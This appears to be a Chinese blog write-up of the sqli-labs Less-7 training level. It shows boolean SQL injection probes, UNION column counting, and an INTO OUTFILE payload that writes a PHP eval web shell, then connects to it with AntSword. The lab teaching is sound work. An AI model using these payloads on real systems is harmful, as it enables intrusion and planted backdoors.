sql注入 sql-lib Less -7

Less-7

首先,这一关的要求是使用文件进行攻击

  1. 判断注入情况,此时两个情况输出是不同的,所以可以断定,这个时候存在注入点。
?id=1')) and 1=1# 
?id=1')) and 1=2# 
  1. 看提示,本关要求的是使用文件注入,也就是我们要在网站创建后门进行攻击。可以考虑into outfile写入文件中

在这里插入图片描述

  1. 攻击载荷,注意:$_POST要大写
'<?php @eval($_POST["mima"])?>' into outfile "F:\\phpStudy\\WWW\\sqli\\Less-7\\bad.php"
  1. 由于我们要在服务器上创建一个名字叫做bad.php的文件,所以必须要可以对服务器的文件进行写操作。

  2. 打开mysql数据库的 my.ini文件,添加一个选项。这里路径为可以写的路径

    secure_file_priv="F:/phpStudy/WWW/"
    

在这里插入图片描述

在这里插入图片描述

  1. 判断列数,当出现第四列报错,所以可以判断只有3列。
id=1')) union select 1,2,3 #
id=1')) union select 1,2,3,4 #

在这里插入图片描述

在这里插入图片描述

  1. 构造语句,这里虽然仍然有报错,但是bad.php文件已经创建。

在这里插入图片描述

在这里插入图片描述

  1. 然后可以使用蚁剑进行连接。至此,拿到权限。

蚁剑:

下载: https://github.com/AntSwordProject/AntSword-Loader
安装指南: https://blog.csdn.net/Ahuuua/article/details/109034528

请添加图片描述

请添加图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值